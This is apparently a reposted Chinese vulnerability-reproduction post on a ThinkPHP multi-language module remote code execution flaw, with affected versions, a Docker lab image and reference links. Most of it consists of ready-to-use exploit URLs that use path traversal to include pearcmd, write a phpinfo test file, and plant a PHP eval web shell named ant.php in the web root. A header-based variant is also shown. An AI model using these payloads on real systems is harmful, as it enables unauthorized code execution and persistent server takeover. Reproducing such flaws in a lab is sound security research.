免责声明
Exp
# 写文件http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php# 包含文件http://172.17.0.2/public/index.php?lang=../../../../../../../../tmp/hello# 直接写一句话?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_REQUEST['ant']);?>+/var/www/html/ant.php# Header和Cookie方式在文中
v6.0.1 < Thinkphp < v6.0.13Thinkphp v5.0.xThinkphp v5.1.x
header="think_lang"/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami/public/index?lang=../../../../../../../Applications/MAMP/bin/php/php5.6.40/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php
https://tttang.com/archive/186https://nosec.org/home/detail/5050.htmhttps://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp
docker pull vulfocus/thinkphp:6.0.12
利用Header写入文件,如图:
利用Cookie写入文件,如图:
Xray Poc
公众号回复ThinkPHP获取。
原文始发于微信公众号(Hack All):【漏洞复现】ThinkPHP 多语言模块RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论